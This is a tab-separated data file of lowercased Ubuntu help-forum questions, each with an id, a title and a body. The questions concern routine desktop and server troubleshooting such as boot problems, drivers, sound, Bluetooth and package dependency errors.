145558	how to download a youtube video via terminal	i would like to download this video http : //www.youtube.com/watch ? v=e_n5dvvqv7g using commands how i download this video via terminal
145567	inverse search from okular to kile	upgraded to 12:04 now ca n't get inverse search to work ( from okular to kile ) my settings : in kile i have : tools - > mode - > normal in okular i have : settings- > configure- > editor ( and set editor to kile ) in kile i have tried the buttons : pdflatex and then forwardpdf and also : latex and then forwardpdf . both bring up pdf in okular , but shift/leftclick does not do an inverse search . a bug in kile ? in okular ? in 12.04 ? in me ? i 'm using a system76 pangolin p8 . thanks for any help
145572	ubuntu on a virtual machine	i 've installed virtual box and am trying to install ubuntu 12.04 from a downloaded iso . everything is going fine but i come to a choice that says no operating system is dectected on this machine , what would you like to do ? 1 ) erase disk and install ubuntu ( this will erase any files on the disk ) or 2 ) something else ( choose partition size , multiple partitions , etc ) . does the first option mean erase all files on the virtual disk -- not the computer ? is it just talking about the virtual machine or if i select this option will it erase my windows operating system and other files on my hard drive ?
145573	logout/shutdown taking very long , how to find the problem ?	some months now , it 's taking very long to logout/shutdown/reboot my ubuntu box . it does n't happen with a fresh profile it still takes ages even when i close all running programs first ( foreground programs ) sometimes a couple of applications are closed before the waiting time ( eg . chrome , music player ) it happened with 11.10 and now 12.04 i did a fresh install of 12.04 but reinstalled all my programs and application settings/profiles ( eg . chrome profile , music db , .bashrc etc . ) , still no solution it happens only when i use the gnome way of rebooting/shutting down/logging out when issuing `` sudo reboot '' in the terminal , there is no waiting time there is no process eating cpu time i have not found any evidence what is causing this whatsoever i 'm using `` gnome-fallback '' ( gnome classic 2d ) what actions does gnome execute when clicking on eg . logout exactly ? i want to trace these steps any help is appreciated very much !
145581	power adapter is not seen in ubuntu 11.10	i have an alienware m17xr3 laptop running ubuntu 11.10 , and there is an issue with my power adapter when it is plugged in after os has already loaded ( i.e . when i unplug it when at ubuntu 's desktop , and then replug it in again ) . the problem is ubuntu thinks its still running on battery power , and that the battery is discharging , and does not recognize my power adapter plugged in . note that when the power adapter is plugged in when ubuntu loads up , there is no issue though . it sees the power adapter just fine . so what can be done to solve this problem ? thanks in advance for any help .
145586	ubuntu 12.04 home folder	i have recently installed ubuntu 12.04 along with windows 7 . i have created a common partition for storing my media files which i want to access from both os . now i want to replace the default home folder menus ( like documents , downloads etc ... ) with the one i have in my common storage . is there any way to accomplish this ?
145589	how to change the functionality of keyboard special keys ?	different keyboards come with different special keys . for example mine has a key for bringing up the calculator , another for putting the to sleep , another for opening email client and so on ... my question is , how can i change what these keys do ? for instance i want my email key ( since i never use it ) perform as the next key on my music player ?
145591	how to block internet for guest account ?	how can i block or disable my ethernet internet connection , for the guest account only ?
145592	x11 initialization failed	what does this mean ** ( gnome-shell:4686 ) : warning ** : command line `dbus-lauch -- autolaunch=de40d0cdda8b10cc42a0ada000000002 -- binary-syntax -- close-stderr ' exited with non-zero exit status 1 : window manager error : unable to open x display and what do i do to solve it ! i can access desktop on tty7 and create files and folders but there 's no taskbar ... i have tried to install gnome-shell and launching it but this was the result !
145596	boot order of mysql	i have a conflict with two programs in ubuntu 10.04 . i have configured an init.d file that boots up a program . however , this program requires mysql to be running before it starts . when i boot the machine , it 's obvious that this script is being executed before mysql has booted successfully . i 'm pretty inexperienced with ubuntu 's booting sequences and run levels . how can i make sure that mysql is running before my init.d script is executed ? i have heard that mysql uses an alternative method of booting to init.d so i 'm not sure how to go about this . thanks !
145600	how to get package list with security and bugfix details ?	i am new ubuntu user and i liked it most . in rhel after installing yum-security package , we can get list of updates like this # yum list-security sample outputs : loaded plugins : rhnplugin , security rhsa-2009:1148-1 security httpd-2.2.3-22.el5_3.2.x86_64 rhsa-2009:1148-1 security httpd-devel-2.2.3-22.el5_3.2.i386 rhsa-2009:1148-1 security httpd-manual-2.2.3-22.el5_3.2.x86_64 rhsa-2009:1148-1 security mod_ssl-1:2.2.3-22.el5_3.2.x86_64 list-security done is there any command to check or list security or bugfix packages ? ? so i can easily install only bug fixed packages or security fixed packages .
145601	how to install package without internet connection	i installed ubuntu on an old computer . it only has a modem port , and no lan port . but since it has usb then i can use the usb mobile dongle to connect to the internet . in order to use it , i need to install the package usb_modeswitch . how and where from to download the files needed from from another computer and how can i install them ?
145602	move the thunderbird notification from bottom panel	i am using ubuntu 12.04 on my laptop and running gnome-shell as primary desktop , i 've couple of questions 1 ) i would like to move the thunder bird notification from bottom right corner to top panel system tray . 2 ) notifications are getting piled up in bottom bar i need to click on each item to clear . say if i get 10 mail then 10 notification icons are there .
145606	removing the period from a hostname	my machine 's hostname is ev.er , and i want to change it to ever . i tried editing /etc/hosts and replacing ev with ever , and also replacing ev.er with ever , saving , and editing the ev that was in /etc/hostname to ever . then i restarted , but the hostname was still ev.er ( it shows ev ) . any solution ?
145611	why does my burned ubuntu dvd have a different hash/checksum than the iso ?	i downloaded the 10.04.4-dvd-amd64.iso file , then burned it to aâ dvd . i then tried installing it but it hangs at 95 % . i then checked the hash with md5sum and they are not the same . the iso is the same as listed on ubuntu.com . i burned the iso using brasero . these are the hashes : ubuntu-10.04.4-dvd-amd64.iso 4083424d0f0030e5480f2d183225616d /dev/dvd1 06631e0997be558620f613a0658331d9
145612	how do i switch from ubuntu to ubuntu server ?	i 'm currently running ubuntu 11.10 on a pc which can no longer handle the graphics ( it 's a dinosaur of sorts ) , and i now want to turn it into a home file server . to do so , i wanted to replace ubuntu with ubuntu server , the command line-only one . how do i do this ?
145615	how to make xbox joypad work with bastion ?	i have an xbox joypad : bus 005 device 004 : id 045e:0289 microsoft corp. xbox controller s when i start bastion from the terminal the following is output : number of joysticks : 1 number of buttons for joystick : 0 - 10 number of axes for joystick : 0 - 6 number of povhats for joystick : 0 - 1 when i load up the game it displays a message `` press any key '' and at this point , if i press a button on the joypad it advances to the main menu . however , the up/down/left/right controls do not work and the button will not operate the menu . when i enter the control configuration , the joypad section is disabled and displays a message `` joypad not detected . '' if i enter the control customization and try to reconfigure one of the controls , noises can be heard when pressing joypad buttons , but the input is otherwise ignored . further information which may or may not be relevant : my controller is an original xbox controller , not a 360 controller . xna games on windows apparently only work with xbox360 controllers because they use xinput rather than direct input , see eg here . my controller works ( almost ) properly with monogame trunk samples , but bastion uses a modified monogame and crashes when run against trunk , so i ca n't add debugging to see where the problem is . bug can also be reproduced with a xbox 360 wired controller .
145617	why is my terminal invisible after minimizing it and how can i find it ?	i minimized my terminal after doing a repo sync . i cant find it on any desktop now ! please help .
145618	how can i shorten my command line ( bash ) prompt ?	currently it is : michael @ castle2012-ubuntu-laptop01 : ~/dropnot/webs/rails_v3/linker/spec/controllers $ outside of renaming my machine and directory structure ... how could i make it be something more like : michael : controllers $
145619	how do i see , find or raise hidden windows on unity desktop ?	when i get lots of windows on the ubuntu 12.04 desktop , i ca n't find a way to see , find or select/raise the hidden windows . this is so fundamental an issue , i 'm sure some mechanism exists for this , but i do n't see it . please explain how to see/find/raise hidden windows on the desktop .
145622	does this theme look familiar ?	i just love the theme in this screenshot . can somebody please give me its name ? the screenshot is intended to demonstrate how the axe menu extension looks like . you can find the original post on k210.org/axemenu .
145624	keyboard shortcut to a sudo-script	how do i create a keyboard shortcut to a script that needs sudo privileges ? i tried to create shortcuts via ubuntu keyboard settings gui to scripts '' sh script.sh '' , `` sudo sh script.sh '' , but they do n't work .
145632	how to speed up video footage to make a timelapse video ?	i 've taken footage of sunsets and traffic etc and would like to make my hour long footage last only 30secs or so , what software can i use to perform this . thank you for your time . phil
145637	can transmission automatically move a download after it 's done seeding , again ?	i have setup transmission so that it initially downloads to a hidden file . after the download is done it gets moved to my downloads folder , for immediate using . however i want transmission to move the download once more when it is done seeding , and , remove the entry from transmission . how do i do this ?
145638	windows xp guest in ubuntu virtualbox ose vm does not install driver to use host 's hp laptop webcam .	i recently created a virtual windows xp with virtual box ose . the sound and video seem to be working just fine . however , it does not recognize the webcam which i use to video chat with yahoo messenger . i use windows to have video chats with my daughters who live in another country . since i did not want to go back to windows , i decided to try installing windows in a virtual machine . but when i tried using it yesterday , everything worked perfectly except for the webcam . i was not able to make the webcam work . i tried to download the drivers for it , but since my laptop is hp pavilion g4-1287la , core i3 , none of the drivers i tried worked . i got the same error every time i tried to install them , something like : this driver can not be installed in this machine
145641	exaile sound indicator menu integration	i just made an ubuntu 12.04 installation on a new computer , and ca n't figure out how i got exaile into the sound indicator menu on my old box . does anyone know how to do this ? sound indicator menu with exaile turned off on my old box : sound indicator menu with exaile turned on :
145646	moved to ssd and now getting `` the disk drive for / is not ready yet ''	i moved my ubuntu 12.04 install over to an ssd drive . copied all directories except for the ones most often written to - var , tmp , ... reinstalled grub into ssd by booting with live cd and following the commands in this post : how to move ubuntu to an ssd this seemed to work fine , because when i press `` e '' in grub menu , i see the expected uuids . but right after grub i get could not log bootup : address already in use the disk drive for / is not ready yet or not present . if i skip , i get same for /tmp /run , and other dirs if i go into manual recovery and do mount -n -o remount , rw / it turns out that everything can mount no problem . ca n't get my head around this one . my fstab seems right . grub is right . ahci in bios is enabled . why is this happening ? what can i do to fix it ? when i do drop into shell from this error and get to mount things manually , how do i get the os to continue loading ? thank you guys for any ideas you can give me . here 's what my fstab looks like right now : # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc defaults 0 0 uuid=67fc8a7a-f1db-485c-88bd-e007c214244f / ext4 defaults , noatime , discard 0 1 # swap was on /dev/sda3 during installation uuid=6bc9cd6c-46b7-43a0-bfac-bd04cc26cfb6 none swap sw 0 0 uuid=7397729b-2125-4b1d-b5eb-28866898d773 /hdd ext4 errors=remount-ro 0 1 /hdd/home /home none bind 0 0 /hdd/run /run none bind 0 0 /hdd/var /var none bind 0 0 tmpfs /tmp tmpfs rw , nodev , nosuid , exec , mode=1777 , size=1024m 0 0 /dev/scd0 /media/cdrom0 udf , iso9660 user , noauto , exec , utf8 0 0 output from blkid : /dev/sda1 : label= '' system reserved '' uuid= '' eabc56c1bc568849 '' type= '' ntfs '' /dev/sda2 : uuid= '' 7ccc6124cc60d9c2 '' type= '' ntfs '' /dev/sda3 : uuid= '' 6bc9cd6c-46b7-43a0-bfac-bd04cc26cfb6 '' type= '' swap '' /dev/sda5 : uuid= '' 7397729b-2125-4b1d-b5eb-28866898d773 '' type= '' ext4 '' /dev/sdb1 : uuid= '' 67fc8a7a-f1db-485c-88bd-e007c214244f '' type= '' ext4 '' relevant from fdisk -l : device boot start end blocks id system /dev/sdb1 2048 115345407 57671680 83 linux
145650	how can i make the icons larger and/or clearer in classic menu indicator ?	i use the classic menu indicator and i 've noticed that the icons are small and blurry . at first i thought that it was the icon theme that just did n't have icons at that size , so i tried various other themes and they were all blurry too . is it possible to go into dconf-editor or something like that to set the icon size to something larger ? thanks
145666	is this fix for avast antivirus crashing safe to use ?	well i have installed avast anti virus on ubuntu 12.04 . but after updating , it crashes ! so i have made some tweaks like below : press ctrl+alt+t to open the terminal . when it opens , run the command below . sudo gedit /etc/init.d/rcs type your password and hit enter . when the text file opens , add the line : sysctl -w kernel.shmmax=128000000 make sure the line you added is before : exec /etc/init.d/rc s this is what it should look like : # ! /bin/sh # rcs # # call all s ? ? * scripts in /etc/rcs.d/ in numerical/alphabetical order # sysctl -w kernel.shmmax=128000000 exec /etc/init.d/rc s save the file . reboot . my question is : did i do anything wrong ? i mean as i have made some tweaks , will it lower the security of avast down like viruses do ? please if you are a programmer check this if it contains bug or harmful intentions ... thanks .
145668	dual boot not recognizing new hard drive	i am a complete linux newb..which will become obvious shortly . the story : i wanted to dual boot with ubuntu . i already had windows on 1 hard drive ( 320gb ) , and i wanted ubuntu on a 2nd hard drive ( 2tb ) . i setup the partitions using the `` something else '' option - i left the first hard drive alone , and put a swap and a ext4 partition on the 2nd hard drive . when it asked me where the bootable device was , i put the first hard drive . the problem : now that ubuntu is installed and grub lets me pick which os to boot to , i boot to ubuntu just fine . but when i go to the home folder and look at devices , the only drive showing is the 320 gb/old hard drive that windows was installed on . i can not see the 2 tb hard drive anywhere . this is strange because i setup the ubuntu partition to be the 2 tb hard drive and i thought i installed ubuntu on that partition . thank you for your time and patience : )
145675	nvidia geforce go 7600 ? can it ever run unity ?	my laptop , a toshiba qosmio g30 , has a nvidia geforce go 7600 graphics card and it 's suppose to support 3d . i am running unity 2d now . the graphic driver is -- vesa : g73 board - toshg73m -- by ubuntu . when i run /usr/lib/nux/unity_support_test -p i got this list : not software rendered : no not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no the card is not blacklisted but a similar one with gt is ! do you think that there is a chance the laptop can run the unity 3d ? maybe i could change the resolution of the screen to a higher one too ! i tried all the nvidia drivers provided but none works ( except 96 in ubuntu 12.04 ) . i get a black screen or terminal screen . best wishes to all
145679	adding commands to the exec line in desktop files	hey so recently i got bastion to work using force_s3tc_enable=true before executing the bin file , my question is how can i add this line to the bastion.desktop file so that it works through the unity shortcut ?
145680	getting my brother mfc-j825dw working as a network scanner	i 've been attempting to set up my new brother multi-function device to work as a printer and scanner using the following steps . it is connected to the network as a lan device , not directly connected to my ubuntu machine . downloaded the lpr driver and cupswrapper driver from brother support . ( select the deb packages , not the rpms ) . followed the instructions to install the lpr driver . followed the instructions to install the cupswrapper driver . after this point i was able to successfully perform a test print , so the printer part is working . so far i have n't had much luck getting the scanner working . this is what i 've tried : downloaded the brscan4 and scan-key-tool deb packages from brother support . followed the instructions for installing the scanner driver for network . followed the instructions for installing scan-key-tool . however when i tried to scan it detects no scanner . i then tried the solution offered in this answer to a question based on a similar brother printer , but no luck . i must have made a mistake somewhere along the line . does anyone have any ideas what i can try to find out what ? or should i uninstall everything and start again from the beginning ?
145687	where to find all program icons ?	using 11.04 and want to change the main menu ( slim it way down ) . before doing that i 'd like to place the icons/shortcuts of the programs i use very seldom into a desktop folder ( only keeping those used very often in the menu ) . once before i was able to find a huge list of everything ( via nautilus ? ) , but i can not find it again .
145688	multi-architectures and their binaries	why is there a /usr/lib and a /usr/lib32 directory but only a /usr/bin and no /usr/bin32 directory on a amd64 64-bit-install of ubuntu ? if or when debian/ubuntu start supporting multi-target-architecture binaries in their elf 's will this directory branching become unnecessary ?
145694	configure multiple network cards for ubuntu server	i have installed ubuntu server 12.04 , i intend this to be a headless web cache server . i used the text-based setup wizard to configure the first nic . i have eth0 set static , now i would like to set eth1 and eth2 to use dhcp from a different domain . how would i go about doing this ?
145697	spotify quicklist for unity	how can i add a unity `` quicklist '' for spotify ( installed from their website ) , so that when i right-click on the icon on my dock , i get : `` next , previous , stop , play '' and so on ?
145698	where does deja-dup keep its config files ?	deja-dup ( now ubuntu backup ) is just a gui for duplicity , therefore it should store the config files somewhere . i would like to changed the backup volume size to something like 300mb and the increase the -- full-if-older-than variable . is this possible ?
145699	stop unity dash from following/linking file	once after i downloaded a file , it shows up in the unity dash as recently downloaded . even after moving the file to another folder , the link on dash opens the file . scarily even when i move the file into a folder which is listed in the privacy tool as do not record the file link still opens from dash , even after rebooting . is there a way to stop this ?
145700	canon mp495 scanner not working	running 12.04 , installed and updated latest drivers for mp495 but nothing stil . latest drivers provided here : https : //code.launchpad.net/~michael-gruz/+archive/canon-trunk/+packages followed this guide to the letter : http : //ubuntuforums.org/showthread.php ? t=1602839 & page=11 xsane and simple scan do not work . i have tried various other programs and have nothing ... people are saying it works well with 11.10 , so i do n't know what the deal is with 12.04 . any help would be greatly appreciated as i need this printer for my out-of-home business , and i really do n't want to switch back windows just for a freaking scanner to function . why do n't these companies realise ubuntu users need to print things too ? !
145703	how do i configure my soundcard for 5.1 sound ?	i am very new to ubuntu and linux as i have used windows only until yesterday . i am attempting to send my audio signal to my pioneer receiver using a single digital optical cable which is plugged into my m2n sli deluxe motherboard . i am sending video with a geforce 8600gt video card through hdmi . that card does not support audio through hdmi . the only thing i have got to work so far is my left channel speaker acts as a stereo left and my sub woofer is trying to act as a stereo right . i was able to achieve this through altering the alsamixer settings . can anyone point me in the right direction on this ?
145706	what does udisks-daemon do and do i need it ?	i was looking into htop and the only process having > 0.0 % cpu ( apart from htop itself ) was /usr/lib/udisks/udisks-daemon . so the questions are : what is this service ? do i need it ? ( or when do i need it ? ) why is it accessing the drives ?
145707	why does n't htop display the same processes as top ?	i have a home server sometimes running at a high cpu usage rate of about 50 to 70 percents . in htop , my favorite process manager , i can sort the processes by cpu usage , but often there is n't any process consuming more than 0 % cpu . on the other side , htop displays the whole cpu usage of the system which is about 50 percents , as said before . i guess that there is an easy explanation for this , but i do n't know it . maybe there are some hidden processes ? but even running it as root does n't show more processes . edit : i looked into top , which is showing ( at least ) two more processes : 230 root 20 0 0 0 0 r 37.4 0.0 107:06.59 md127_raid5 20403 root 35 15 0 0 0 d 9.6 0.0 2:45.78 md127_resync so my mdadm raid is currently resyncing , which has been confirmed when i displayed /proc/mdstat . ( see first comment . ) so this turns the question in : `` why does n't htop display the same processes than top ? ''
145710	ca n't access maas web interface	i 'm currently using a virtual machine to run ubuntu server . i installed maas on it . i got this error everytime . the requested url /maas was not found on this server . apache/2.2.22 ( ubuntu ) server at 192.168.1.105 port 80 i tried to access the web interface . i do n't understand what i 'm doing wrong . can someone help me out ? thank you .
145716	can not install mplab ide x from the terminal - silently exits	i have a file , and terminal wo n't run it . i do n't understand why . there are a number of files in directory , but the binaries are the only ones that fail . help ? i use this program for my work , and without it i 'm in a world of un-productivity . i just did a clean install of 12.04 . am i missing a vital package ? why are there no errors , is it the binary itself ? they are marked as executable . mantra @ mantra : ~ $ cd iambuff/mplab\ 1.2\ full\ package/ mantra @ mantra : ~/iambuff/mplab 1.2 full package $ ls mplabc18-v3.40-linux-full-installer.run picc-9.83-linux.run mplabx-ide-v1.20-linux-installer.run picc-9.83-linux.zip picc-18-9.80.11162-linux.run xc8-v1.00-linux.run picc_18_9_80_linux_run.zip mantra @ mantra : ~/iambuff/mplab 1.2 full package $ sudo ./mplabx-ide-v1.20-linux-installer.run [ sudo ] password for mantra : mantra @ mantra : ~/iambuff/mplab 1.2 full package $ sudo ./mplabx-ide-v1.20-linux-installer.run -v mantra @ mantra : ~/iambuff/mplab 1.2 full package $ in response to the first response to my question , here is the -lh output and the echo . thanks . mantra @ mantra : ~/iambuff/mplab 1.2 full package $ ls -lh total 712m -rwxr-xr-x 1 mantra mantra 71m jun 1 01:48 mplabc18-v3.40-linux-full-installer.run -rwxrwxr-x 1 mantra mantra 230m jun 1 01:11 mplabx-ide-v1.20-linux-installer.run -rwxrwxr-x 1 mantra mantra 123m sep 26 2011 picc-18-9.80.11162-linux.run -rw-r -- r -- 1 mantra mantra 122m jun 1 02:10 picc_18_9_80_linux_run.zip -rwxrwxr-x 1 mantra mantra 17m sep 21 2011 picc-9.83-linux.run -rw-r -- r -- 1 mantra mantra 17m jun 1 02:08 picc-9.83-linux.zip -rwxr-xr-x 1 mantra mantra 136m jun 1 02:04 xc8-v1.00-linux.run mantra @ mantra : ~/iambuff/mplab 1.2 full package $ sudo ./mplabx-ide-v1.20-linux-installer.run [ sudo ] password for mantra : mantra @ mantra : ~/iambuff/mplab 1.2 full package $ in response to the third post . the echo command yields 127 ? mantra @ mantra : ~/iambuff/mplab 1.2 full package $ ./mplabx-ide-v1.20-linux-installer.run mantra @ mantra : ~/iambuff/mplab 1.2 full package $ echo $ ? 127 mantra @ mantra : ~/iambuff/mplab 1.2 full package $
145718	applications menu in 11.04= > how to add a search/run box ?	some other time i had another linux installation that had this neat & active search/run box in the main applications menu . that is missing in my current installation of 11.04 . would someone teach me how to get one of those please ? thanks .
145720	what files get edited when the system time changes ?	if the system time is changed on linux , what files get edited ? i know the timezone is kept in etc/timezone but is there anything if the timezone is not changed , but the time is ?
145724	how do i add window manager from scratch ( wmfs ) to the window manager selection in the login screen ?	how do i add window manager from scratch ( wmfs ) to the window manager selection in the login screen ? i 've installed it already and now i want to boot it , but how do i do that ? regards , senad
145731	problems with icons in lubuntu	good night . i have a problem , i installed lubuntu operating system , but i have a question as i put the icons on the desktop , icons such as trash , home , etc ... i would also like to know how to enter the browser window as administrator .
145732	bootable `` live '' partition on 1tb external hdd	i have a 1tb wd passport . i made a 20gb partition , formatted to fat , for a persistent live ubuntu install . the rest i formatted as ntfs , to be used for backups . i made the 20gb live install with ubuntu startup disk creator . the entire drive was previously formatted with ubuntu disk utility ; 20gb fat , remainder ntfs . ubuntu startup disk creator ran with no errors . however , when i boot , and select the wd passport as the first boot disk i get a black screen with a cursor in the corner . is there something special i have to do to boot from this partition ? here is the partition table from the hard drive : device boot start end blocks id system /dev/sdb1 * 63 39070079 19535008+ 83 linux /dev/sdb2 39070080 1953455804 957192862+ 7 hpfs/ntfs/exfat any ideas ?
145733	a2dp connection not shown in pulseaudio	i 'm trying to pipe the audio ouput to my belkin z73 bluetooth receiver but once connected and paired with the key 0000 the receiver does n't show up in pulseaudio . furthermore the following command pactl load-module module-loopback source=alsa_output.pci-0000_00_1b.0.analog-stereo sink=bluez_source.00:02:72 : ea:95:61 returns failure : module initalization failed . does someone know what 's going on ? is there anything else i could try to pipe the audio ?
145735	adobe flash player not working with amazon prime	i have ubuntu 12.04 64bit using google chrome . i had chromium from the app center then today amazon prime video stopped working . it told me to update flash . so i uninstalled chromium and installed google chrome . did n't work . then i downloaded flash for ubuntu via apt . that one gave me a `` flash version is n't supported '' message . the flash version was 11 . now i tried http : //apt.ubuntu.com/p/flashplugin-installer it worked , but right in the middle of the video , it popped the error message again . sorry we are unable to stream this video . this is likely because your flash player needs to be updated . so i do n't know what happened .
145736	html link to pictures that are not published in u1	this may be a dumb question , but i would like to store my portfolio in u1 and on my own web server ( running 12.04 ) have links in the html for my portfolio page that point and load the images from u1 . i see how to do this if i publish the photo , but is there a way to do this without publishing ? tia , dante
145737	passively monitoring cpu activity	so everytime i leave my ubuntu desktop alone , it seems that after a while it starts `` working on stuff '' -- cpu lights lighting , that busy cpu processing sound being pretty loud , etc . but when i move my mouse , it just goes away . i do n't think it 's spyware just yet , but , ( puts on tinfoil hat ) is there any way to figure out what kind of processes were running that were taking the most cpu time , and log them historically ? i 'm thinking of writing a daemon for monitoring this , actually , but if there 's already an existing tool for this , that would be better i guess ?
145741	wifi will not connect with an intel wifi link 1000	i have an hp dv7t-6100cto laptop . i have linux ubuntu 12.04 lts dual booted . the specs of my laptop are : - i7-2620m dual core ( 2.7 ghz ) processor - intel wifi link 1000 bgn wireless card i am having a hard time getting my laptop to connect to the internet through wireless . ethernet is fine , but at college i need wireless the majority of the time . can anyone help ? some steps i have done : i have tried wicd while uninstalling the network manager . when that did n't work , i uninstalled wicd and reinstalled network manager . i an not really sure what else to do . i am having trouble with both wpa and wpa2 enterprise . i need at least one of the to work .
145742	my sound randomly mutes sometimes in ubuntu 12.04	my sound sometimes stops working when i 'm playing a video or music on vlc . this happens when i pause it for a while or skip a part . also in emesene the sound mutes sometimes and my sound settings sometimes said that the sound is muted without me changing it myself .
145743	cant fix dependecy problems on ubuntu 12.04 ( libcanberra-gtk )	cant install any package neither `` apt-get upgrade '' due dependencies errors on libcanberra-gtk0 root @ loper : ~ # apt-get check you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : gnome-session-canberra : breaks : libcanberra-gtk0 ( < 0.28-4 ) but 0.28-3ubuntu3 is installed e : unmet dependencies . try using -f. root @ loper : ~ # apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : libcanberra-gtk0 the following packages will be upgraded : libcanberra-gtk0 1 upgraded , 0 newly installed , 0 to remove and 585 not upgraded . 2 not fully installed or removed . need to get 0 b/17.1 kb of archives . after this operation , 9,216 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of libcanberra-gtk0 : i386 : gnome-session-canberra ( 0.28-4 ) breaks libcanberra-gtk0 ( < < 0.28-4 ) and is unpacked but not configured . version of libcanberra-gtk0 : i386 to be configured is 0.28-3ubuntu3 . dpkg : error processing libcanberra-gtk0 : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gnome-session-canberra : gnome-session-canberra depends on libcanberra-gtk0 ; however : package libcanberra-gtk0 : i386 is not configured yet . dpkg : error processing gnome-session-canberra ( -- configure ) : dependency problems - leaving unconfigured configured to not write apport reports errors were encountered while processing : libcanberra-gtk0 : i386 gnome-session-canberra e : sub-process /usr/bin/dpkg returned an error code ( 1 ) trying to install something root @ loper : ~ # apt-get install -f aptitude reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : aptitude : depends : libboost-iostreams1.49.0 ( > = 1.49.0-1 ) but it is not going to be installed depends : libcwidget3 but it is not going to be installed depends : libept1.4.12 but it is not going to be installed recommends : aptitude-doc-en but it is not going to be installed or aptitude-doc recommends : libparse-debianchangelog-perl but it is not going to be installed gnome-session-canberra : breaks : libcanberra-gtk0 ( < 0.28-4 ) but 0.28-3ubuntu3 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . how i can fix this ? any hint ? thanks in advance .
145744	unix command line giving me apt-get errors	i 'm trying to run apt-get update and apt-get install emacs23 , but i keep getting errors saying either e : unable to fetch some archives , maybe run apt-get update or try with -- fix missing ? running apt-get update gives the same result . in some cases , it will say unable to get some archives . what can i do to fix this ?
145745	why is everything crashing ?	i 've been using ubuntu for a while now and i love it , i would n't think of using another os unless i ca n't fix this issue . the install i 'm on is only around a month and a half old . i 'm running 12.04 64bit on a 8,1 mbp . up until around 2 weeks ago everything was running smoothly . around then applications started crashing and weird things started happening . at first i thought it was just certain applications . the first thing to start giving me trouble was compiz . occasionally compiz will stop decorating windows and lost many other functionalities . running compiz -- replace fixes this , but i do n't feel like doing it usually once a day . the other thing with this is that after running compiz -- replace , my conky window gets lost somewhere and so i run killall conky & & conky -c .conkyrc . but this is n't with just a couple applications , it seems like it is proliferating through my system . last week fontforge started crashing while doing whatever task . so i ended up unable to finish what i was working on to completeness . did n't find a fix . today rhythmbox started crashing . whenever i try to play anything , rhythmbox becomes unresponsive and needs to be forced to close . when i try to do certain things with the disk utility , it crashes . i get the ubuntu has experienced an internal error message much more often than i would like . frequently applications stop appearing in the launcher . wine almost never does anymore . after not being active for a little while , thunderbird can only fetch my mail after restarting wireless , sudo rmmod b43 & & sudo modprobe b43 occasionally some of my startup apps do n't start . what is my best option here ? could they be bugs ? i do n't want to submit a ton of vague bug reports . reinstall ? switch os ? thank you to anyone who responds . kopkins
145748	how to compile a .java file	how can i compile a .java file . what programs will i need and if i need java jdk i need help installing that . i 'm very new to ubuntu so any program i need to install i will need a tutorial on how to install them .
145755	new and just installed ubuntu ... . but my memory usage messed up	ussing an old laptop and things so far look like they are running well . again it 's only a few hours now . anyway ... here is what my details say : memory : 1.9 gb system type :32 bit hd size 77.8 gb is this telling me i only have 1.9 gb left ? i just installed this over windows so everything should be gone ... should be plenty of hd left not 1.9 gb . any help will be appreciated .
145757	system.entrypointnotfoundexception error when trying to run bastion	i have downloaded bastion for ubuntu and installed in the home folder normally . when executing `` games > bastion '' nothing happens . running bastion directly from the installation folder results in the error below unhandled exception : system.entrypointnotfoundexception : glprogramparameteri at ( wrapper managed-to-native ) opentk.graphics.opengl.gl/core : programparameteri ( uint , opentk.graphics.opengl.assemblyprogramparameterarb , int ) at opentk.graphics.opengl.gl.programparameter ( int32 program , assemblyprogramparameterarb pname , int32 value ) [ 0x00000 ] in < filename unknown > :0 at microsoft.xna.framework.graphics.effectpass.applypass ( ) [ 0x00000 ] in < filename unknown > :0 at microsoft.xna.framework.graphics.effect.definetechnique ( system.string techniquename , system.string passname , int32 vertexindex , int32 fragmentindex ) [ 0x00000 ] in < filename unknown > :0 at microsoft.xna.framework.graphics.spriteeffect..ctor ( microsoft.xna.framework.graphics.graphicsdevice graphicsdevice ) [ 0x00000 ] in < filename unknown > :0 at microsoft.xna.framework.graphics.spritebatch..ctor ( microsoft.xna.framework.graphics.graphicsdevice graphicsdevice ) [ 0x00000 ] in < filename unknown > :0 at gsge.exceptiongame.loadcontent ( ) [ 0x00000 ] in < filename unknown > :0 < snip > i have tried some solutions on the internet , like adding opentk.dll.config the line below : < dllmap os= '' linux '' dll= '' libxi '' target= '' libxi.so.6 '' / > this did n't help . also tried running as sudo and that did n't help . some posts said that this might be a problem with ubuntu noveau drivers . but i 'm using the nvidia proprietary drivers . distrib_id=ubuntu distrib_release=10.04 distrib_codename=lucid distrib_description= '' ubuntu 10.04.4 lts '' opengl vendor string : nvidia corporation opengl renderer string : geforce 9400 gt/pci/sse2 opengl version string : 3.2.0 nvidia 195.36.24 direct rendering : yes
145759	adding swap volume	i have recently installed ubuntu 12.04 alongside my windows 7 . but i did not created swap volume for ubuntu . there are already 4 partitions on my hard drive ( one windows 7 , one system tools ( windows 7 ) , one for ubuntu and one for common media storage ( ntfs ) ) . therefore gparted did n't allow me to create any further partition for swap volume.all it said to create an extended partition , but i do not know to do this . i want to create a swap volume out of common media storage . how can i accomplish this ? and i 'm completely new at ubuntu , so can you suggest some good getting started tutorial for it ?
145760	run private browsing mode and normal session simultaneously in firefox	if i start private browsing , firefox quits normal firefox instance and switches to private browsing . so is there any way to stop firefox from starting private browsing without closing the normal firefox instance running ?
145763	`` no bluetooth adapter found '' error on an asus k53e	i have installed ubuntu 12.04 64 bit os on my asus k53e . i can not get bluetooth to work , i see that it says `` no bluetooth adapter found '' . i have an atheros bluetooth adapter , could you please help me how to get this fixed .
145767	`` unable to find service record '' when transfering files from 1 laptop to another after setting up a connection	i have paired 2 laptops using set up new device but ca n't send files from one to another . it shows unable to find service record . i am using ubuntu 12.04 now . kindly help me ! but i can send files from both laptop to phones .
